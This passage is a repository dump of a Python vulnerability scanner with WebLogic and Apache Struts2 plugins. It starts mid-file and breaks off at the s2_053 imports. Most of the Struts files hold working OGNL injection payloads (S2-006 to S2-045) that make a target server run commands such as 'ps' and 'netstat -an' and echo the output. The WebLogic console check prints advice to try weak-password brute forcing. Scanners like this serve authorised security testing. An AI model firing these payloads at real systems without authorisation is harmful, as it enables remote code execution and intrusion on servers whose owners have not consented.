                print(Vcolors.OKBLUE+"[+]上传文件成功: " + upload_path+Vcolors.ENDC)
        except:
            # bare except: any failure (including KeyboardInterrupt) prints this line
            print(Vcolors.FAIL+"[-]上传文件失败....."+Vcolors.ENDC)

    # The following reproduces the computation of the 8-character random
    # directory name used by the WebLogic service (Java String.hashCode
    # rendered in base 36).
    def convert_n_bytes(self,n, b):
        """Wrap integer n into the signed two's-complement range of a b-byte integer."""
        bits = b * 8
        return (n + 2 ** (bits - 1)) % 2 ** bits - 2 ** (bits - 1)

    def convert_4_bytes(self,n):
        """Wrap n to a signed 32-bit value (Java int overflow semantics)."""
        return self.convert_n_bytes(n, 4)

    def getHashCode(self,s):
        """Return Java String.hashCode() of s: sum of ord(c) * 31**(n-1-i), wrapped to 32 bits."""
        h = 0
        n = len(s)
        for i, c in enumerate(s):
            h = h + ord(c) * 31 ** (n - 1 - i)
        return self.convert_4_bytes(h)

    def toString(self,strs,radix):
        """Port of Java Integer.toString(int, int): render int(strs) in `radix`.

        Like the Java original it works in the negative range so that negation
        cannot overflow.  Returns a list of characters (leading '-' for
        negative input), not a str.
        NOTE(review): Python's % is non-negative for a positive radix, so
        `digits[int(-(i%radix))]` relies on negative list indexing wrapping
        around the 36-entry table; the result is only correct for radix 36,
        which is the sole radix get_path() uses.
        """
        i = int(strs)
        digits = [
            '0' , '1' , '2' , '3' , '4' , '5' ,
            '6' , '7' , '8' , '9' , 'a' , 'b' ,
            'c' , 'd' , 'e' , 'f' , 'g' , 'h' ,
            'i' , 'j' , 'k' , 'l' , 'm' , 'n' ,
            'o' , 'p' , 'q' , 'r' , 's' , 't' ,
            'u' , 'v' , 'w' , 'x' , 'y' , 'z'
        ]
        # 65-slot scratch buffer filled from the right, as in the Java code
        buf = list(range(65))
        charPos = 64
        negative = int(strs) < 0
        if not negative:
            i = -int(strs)

        while (i<=-radix):
            buf[int(charPos)] = digits[int(-(i%radix))]
            charPos = charPos - 1
            # float division truncates toward zero here, matching Java int division
            i = int(i / radix)
        buf[charPos] = digits[int(-i)]
        if negative:
            charPos = charPos - 1
            buf[charPos] = '-'
        return (buf[charPos:charPos+65-charPos])

    def get_path(self,serverName):
        """Return the base-36 hash of "<serverName>_bea_wls_deployment_internal_bea_wls_deployment_internal.war" with any '-' removed."""
        strings = "%s_%s_%s" % (serverName,"bea_wls_deployment_internal","bea_wls_deployment_internal.war")
        return "".join(self.toString(self.getHashCode(strings),36)).replace("-","")

    def run(self,ip,port):
        """Build http://<ip>:<port> (plain http only) and hand it to check()."""
        url = 'http://'+str(ip)+':'+str(port)
        self.check(url)
132 |
--------------------------------------------------------------------------------
/app/plugins/WeblogicConsole.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : WeblogicConsole.py
4 | @Time : 2019/07/06 01:45:28
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import logging
13 | import sys
14 | import requests
15 |
16 | from ..platform import ManageProcessor
17 | from lib import *
18 |
# NOTE(review): this module logs to 'app/Weblogic.log' while the CVE-* plugins
# use 'Weblogic.log'; since logging.basicConfig() only takes effect on the
# first call in the process, which file is written depends on import order.
logging.basicConfig(filename='app/Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="w", level=logging.INFO)

# NOTE(review): not referenced anywhere in this module -- islive() builds its
# own local `url` and run()'s parameter of the same name shadows this one.
# Presumably a leftover from local testing.
url = "http://192.168.3.32:7001/"
24 |
25 |
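@ManageProcessor.plugin_register('weblogic-console')
class WeblogicCosole(object):
    """Plugin 'weblogic-console': reports whether the console login page answers HTTP 200.

    The class name keeps its original (misspelled) form so the registration
    and any external references remain valid.
    """
    headers = {'user-agent': 'ceshi/0.0.1'}

    def process(self,ip,port):
        """Plugin hook invoked by ManageProcessor; delegates to run()."""
        self.run(ip,port)

    def _login_url(self, host, port):
        """Return http://<host>:<port>/console/login/LoginForm.jsp (plain http only)."""
        return 'http://' + str(host)+':'+str(port)+'/console/login/LoginForm.jsp'

    def islive(self,ur,port):
        """GET the console login page on ur:port.

        Returns the HTTP status code, or None when the request itself fails
        (connection error, timeout, malformed URL).  Previously such failures
        raised out of the plugin and aborted the scan.
        """
        url=self._login_url(ur, port)
        try:
            # timeout= keeps an unresponsive host from blocking the scan indefinitely
            r = requests.get(url, headers=self.headers, timeout=10)
        except requests.RequestException:
            return None
        return r.status_code

    def run(self,url,port):
        """Report via logging and print whether the login page returned 200.

        `url` is the host part only; the full page URL is built by _login_url().
        A None from islive() (request failure) falls into the "not found" branch.
        """
        if self.islive(url,port)==200:
            u=self._login_url(url, port)
            logging.info("[+]The target Weblogic console address is exposed! The path is: {} Please try weak password blasting!".format(u))
            print(Vcolors.OKBLUE+"[+]The target Weblogic console address is exposed!\n[+]The path is: {}\n[+]Please try weak password blasting!".format(u)+Vcolors.ENDC)
            print(Vcolors.OKGREEN+'[+]Weblogic后台路径存在'+Vcolors.ENDC)
        else:
            logging.info('[-]Target Weblogic console address not found!')
            print(Vcolors.FAIL+"[-]Target Weblogic console address not found!"+Vcolors.ENDC)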
45 |
--------------------------------------------------------------------------------
/app/plugins/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : __init__.py
4 | @Time : 2019/08/02 10:48:57
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 |
13 | __all__ = ['WeblogicConsole','CVE-2014-4210','CVE-2019-2725','CVE-2019-2729','CVE-2017-10271','CVE-2017-3506','CVE-2019-2618','CVE-2018-2894','CVE-2018-2628','CVE-2018-2893','CVE-2016-0638','CVE-2016-3510','CVE-2017-3248',]
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2014-4210.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2014-4210.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2016-0638.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2016-0638.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2016-3510.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2016-3510.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2017-10271.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2017-10271.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2017-3248.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2017-3248.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2017-3506.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2017-3506.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2018-2628.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2018-2628.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2018-2893.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2018-2893.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2018-2894.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2018-2894.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2019-2618.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2019-2618.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2019-2725.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2019-2725.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/CVE-2019-2729.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/CVE-2019-2729.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/WeblogicConsole.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/WeblogicConsole.cpython-37.pyc
--------------------------------------------------------------------------------
/app/plugins/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app/plugins/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_006.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_006.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_009.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_009.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_013.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_013.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_016.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_016.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_016_2.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_016_2.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_019.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_019.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_032.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_032.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_045.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_045.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_052.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_052.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_053.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_053.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_057.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_057.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/__pycache__/s2_dev.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JE2Se/VayneScan/b520f8125d823e126aace4be328551bbfd1a6cc8/app2/__pycache__/s2_dev.cpython-37.pyc
--------------------------------------------------------------------------------
/app2/s2_006.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_006.py
4 | @Time : 2019/08/03 22:28:14
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 |
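def s2_006(url):
    """Probe `url` for S2-006 and print a one-line verdict.

    The fixed `exp` body is POSTed as form data and "PID" in the response body
    is the marker the check looks for.  Only request-level failures
    (connection error, timeout, malformed URL) print the "not vulnerable"
    line as before; other exceptions -- including KeyboardInterrupt, which the
    original bare `except:` swallowed -- now propagate.  Returns None.
    """
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    exp = '''('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ps\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))'''
    try:
        resp = requests.post(url, data=exp, headers=headers, timeout=10)
    except requests.RequestException:
        print(Vcolors.OKGREEN +"不存在S2-006漏洞~"+ Vcolors.ENDC)
        return
    if "PID" in resp.text:
        print(Vcolors.RED +"存在S2-006漏洞~"+ Vcolors.ENDC)
    else:
        print(Vcolors.OKGREEN +"不存在S2-006漏洞~"+ Vcolors.ENDC)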
--------------------------------------------------------------------------------
/app2/s2_009.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_009.py
4 | @Time : 2019/08/03 22:01:48
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 |
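def s2_009(url):
    """Probe `url` for S2-009 and print a one-line verdict.

    The fixed `exp` query string is appended to `url` and fetched with GET;
    "PID" in the response body is the marker the check looks for.  Only
    request-level failures (connection error, timeout, malformed URL) print
    the "not vulnerable" line as before; other exceptions -- including
    KeyboardInterrupt, which the original bare `except:` swallowed -- now
    propagate.  Returns None.
    """
    exp = '''?class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]'''
    url += exp
    try:
        resp = requests.get(url, timeout=10)
    except requests.RequestException:
        print(Vcolors.OKGREEN +"不存在S2-009漏洞~"+ Vcolors.ENDC)
        return
    if "PID" in resp.text:
        print(Vcolors.RED +"存在S2-009漏洞~"+ Vcolors.ENDC)
    else:
        print(Vcolors.OKGREEN +"不存在S2-009漏洞~"+ Vcolors.ENDC)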
--------------------------------------------------------------------------------
/app2/s2_013.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_013.py
4 | @Time : 2019/08/03 22:01:58
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 |
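def s2_013(url):
    """Probe `url` for S2-013 and print a one-line verdict.

    The fixed `exp` body is POSTed as form data and "PID" in the response body
    is the marker the check looks for.  Only request-level failures
    (connection error, timeout, malformed URL) print the "not vulnerable"
    line as before; other exceptions -- including KeyboardInterrupt, which the
    original bare `except:` swallowed -- now propagate.  Returns None.
    """
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    exp = '''a=1${(%23_memberAccess["allowStaticMethodAccess"]=true,%23a=@java.lang.Runtime@getRuntime().exec('ps').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[50000],%23c.read(%23d),%23sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())}'''
    try:
        resp = requests.post(url, data=exp, headers=headers, timeout=10)
    except requests.RequestException:
        print(Vcolors.OKGREEN +"不存在S2-013漏洞~"+ Vcolors.ENDC)
        return
    if "PID" in resp.text:
        print(Vcolors.RED +"存在S2-013漏洞~"+ Vcolors.ENDC)
    else:
        print(Vcolors.OKGREEN +"不存在S2-013漏洞~"+ Vcolors.ENDC)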
--------------------------------------------------------------------------------
/app2/s2_016.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_016.py
4 | @Time : 2019/08/03 22:02:15
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 |
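def s2_016(url):
    """Probe `url` for S2-016 and print a one-line verdict.

    The fixed `exp` query string is appended to `url` and fetched with GET;
    "PID" in the response body is the marker the check looks for.  Only
    request-level failures (connection error, timeout, malformed URL) print
    the "not vulnerable" line as before; other exceptions -- including
    KeyboardInterrupt, which the original bare `except:` swallowed -- now
    propagate.  Returns None.
    """
    exp = '''?redirect:$%7B%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%20%7B'ps'%7D)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader%20(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3d%20%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println%20(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D'''
    url = url + exp
    try:
        # timeout= added for consistency with the sibling s2_* checks (10 s);
        # the original call had none and could block indefinitely.
        res = requests.get(url, timeout=10)
    except requests.RequestException:
        print(Vcolors.OKGREEN +"不存在S2-016漏洞~"+ Vcolors.ENDC)
        return
    if "PID" in res.text:
        print(Vcolors.RED +"存在S2-016漏洞~"+ Vcolors.ENDC)
    else:
        print(Vcolors.OKGREEN +"不存在S2-016漏洞~"+ Vcolors.ENDC)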
--------------------------------------------------------------------------------
/app2/s2_016_2.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_016_2.py
4 | @Time : 2019/08/03 22:02:06
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 |
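def s2_016_2(url):
    """S2-016 variant that carries the expression in a multipart form field.

    A hand-built multipart body (fixed boundary, declared in both the header
    and ``exp``) is POSTed; the field name holds the OGNL expression and the
    ``cmd=ps`` parameter it reads. ``PID`` in the body is the success signal.

    Args:
        url: Target URL, used verbatim as the POST endpoint.

    Returns:
        None; the verdict is printed. Note the "vulnerable" message says
        S2-016 while the "not vulnerable" one names the multipart variant —
        kept as-is so existing log parsing is not affected.
    """
    headers = {
        "Accept-Encoding": "gzip, deflate",
        "Connection": " Keep-Alive",
        "Cookie": "",
        "Content-Type": "multipart/form-data; boundary=------------------------4a606c052a893987",
    }
    exp = '''--------------------------4a606c052a893987\r\nContent-Disposition: form-data; name="method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org.apache.struts2.ServletActionContext@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#s=new java.util.Scanner(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()).useDelimiter(#parameters.pp[0]),#str=#s.hasNext()?#s.next():#parameters.ppp[0],#w.print(#str),#w.close(),1?#xx:#request.toString&cmd=ps&pp=\\A&ppp= &encoding=UTF-8"\r\n\r\n-1\r\n--------------------------4a606c052a893987--'''
    try:
        resp = requests.post(url, data=exp, headers=headers, timeout=10)
    except Exception:
        # Narrowed from a bare ``except:`` so Ctrl-C still aborts the scan.
        print(Vcolors.OKGREEN + "不存在S2-016_multipart_formdata__special漏洞~" + Vcolors.ENDC)
        return
    if "PID" in resp.text:
        print(Vcolors.RED + "存在S2-016漏洞~" + Vcolors.ENDC)
    else:
        print(Vcolors.OKGREEN + "不存在S2-016_multipart_formdata__special漏洞~" + Vcolors.ENDC)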
--------------------------------------------------------------------------------
/app2/s2_019.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_019.py
4 | @Time : 2019/08/03 22:02:33
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 |
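def s2_019(url):
    """Check *url* for Struts S2-019 (dev-mode ``debug=command`` expression).

    The raw (not URL-encoded) expression in ``exp`` is appended as a query
    string and fetched with GET; ``PID`` in the body is the success signal.

    Args:
        url: Target URL; ``exp`` is appended to it unchanged.

    Returns:
        None; the verdict is printed.
    """
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    exp = '''?debug=command&expression=#a=(new java.lang.ProcessBuilder('ps')).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#out=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#out.getWriter().println(new java.lang.String(#e)), #d.read(#e),#out.getWriter().println(new java.lang.String(#e)) , #d.read(#e),#out.getWriter().println(new java.lang.String(#e)) ,#out.getWriter().flush(),#out.getWriter().close()'''
    # Local instead of rebinding the ``url`` parameter, for readability.
    target = url + exp
    try:
        resp = requests.get(target, headers=headers, timeout=10)
    except Exception:
        # Narrowed from a bare ``except:`` so Ctrl-C still aborts the scan.
        print(Vcolors.OKGREEN + "不存在S2-019漏洞~" + Vcolors.ENDC)
        return
    if "PID" in resp.text:
        print(Vcolors.RED + "存在S2-019漏洞~" + Vcolors.ENDC)
    else:
        print(Vcolors.OKGREEN + "不存在S2-019漏洞~" + Vcolors.ENDC)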
--------------------------------------------------------------------------------
/app2/s2_032.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_032.py
4 | @Time : 2019/08/03 22:02:50
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 |
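def s2_032(url):
    """Check *url* for Struts S2-032 (OGNL via the ``method:`` prefix).

    The URL-encoded expression in ``exp`` is appended as a query string and
    fetched with GET; it reads its command from the ``cmd=ps`` parameter, and
    ``PID`` in the body is the success signal.

    Args:
        url: Target URL; ``exp`` is appended to it unchanged.

    Returns:
        None; the verdict is printed.
    """
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    exp = '''?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=ps&pp=\\A&ppp=%20&encoding=UTF-8'''
    target = url + exp
    try:
        resp = requests.get(target, headers=headers, timeout=10)
    except Exception:
        # Narrowed from a bare ``except:`` so Ctrl-C still aborts the scan.
        print(Vcolors.OKGREEN + "不存在S2-032漏洞~" + Vcolors.ENDC)
        return
    if "PID" in resp.text:
        print(Vcolors.RED + "存在S2-032漏洞~" + Vcolors.ENDC)
    else:
        print(Vcolors.OKGREEN + "不存在S2-032漏洞~" + Vcolors.ENDC)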
--------------------------------------------------------------------------------
/app2/s2_045.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_045.py
4 | @Time : 2019/08/03 19:15:22
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 | import sys
11 | import requests
12 | from lib import *
13 |
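def s2_045(url):
    """Check *url* for Struts S2-045 (OGNL in the ``Content-Type`` header).

    Unlike the other S2 checks this one runs no command: the expression only
    writes the marker ``struts2_security_check`` into the response, and the
    body is searched for that string.

    Args:
        url: Target URL, fetched with GET.

    Returns:
        None; the verdict is printed.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
        "Content-Type": "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}.b"
    }
    try:
        # timeout added for consistency with the sibling checks; the original
        # call had none and could block the whole scan on a silent host.
        r = requests.get(url, headers=headers, timeout=10)
    except Exception:
        # Narrowed from a bare ``except:`` so Ctrl-C still aborts the scan.
        print(Vcolors.OKGREEN + "不存在S2-045漏洞~" + Vcolors.ENDC)
        return
    if "struts2_security_check" in r.text:
        print(Vcolors.RED + "存在S2-045漏洞~" + Vcolors.ENDC)
    else:
        print(Vcolors.OKGREEN + "不存在S2-045漏洞~" + Vcolors.ENDC)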
--------------------------------------------------------------------------------
/app2/s2_052.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_052.py
4 | @Time : 2019/08/03 22:03:41
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
15 |
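def s2_052(url):
    """Check *url* for Struts S2-052 (REST plugin XStream deserialization).

    POSTs an ``application/xml`` request whose body is empty and reports a hit
    if ``java.util.HashMap`` appears in the response text. With an empty body
    this can only ever match whatever the server echoes on its own, so treat a
    green result from this check as inconclusive rather than as a clean bill.

    Args:
        url: Target URL, used verbatim as the POST endpoint.

    Returns:
        None; the verdict is printed.
    """
    data = ""
    headers = {'Content-type': 'application/xml'}
    try:
        # timeout added for consistency with the sibling checks; the original
        # call had none and could block the whole scan on a silent host.
        res = requests.post(url, headers=headers, data=data, timeout=10)
    except Exception:
        # Narrowed from a bare ``except:`` so Ctrl-C still aborts the scan.
        print(Vcolors.OKGREEN + "不存在S2-052漏洞~" + Vcolors.ENDC)
        return
    if "java.util.HashMap" in res.text:
        print(Vcolors.RED + "存在S2-052漏洞~" + Vcolors.ENDC)
    else:
        print(Vcolors.OKGREEN + "不存在S2-052漏洞~" + Vcolors.ENDC)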
--------------------------------------------------------------------------------
/app2/s2_053.py:
--------------------------------------------------------------------------------
1 | # -*- encoding: utf-8 -*-
2 | '''
3 | @File : s2_053.py
4 | @Time : 2019/08/03 22:08:25
5 | @Author : JE2Se
6 | @Version : 1.0
7 | @Contact : admin@je2se.com
8 | @WebSite : https://www.je2se.com
9 | '''
10 |
11 |
12 | import requests
13 | from lib import *
14 | import sys
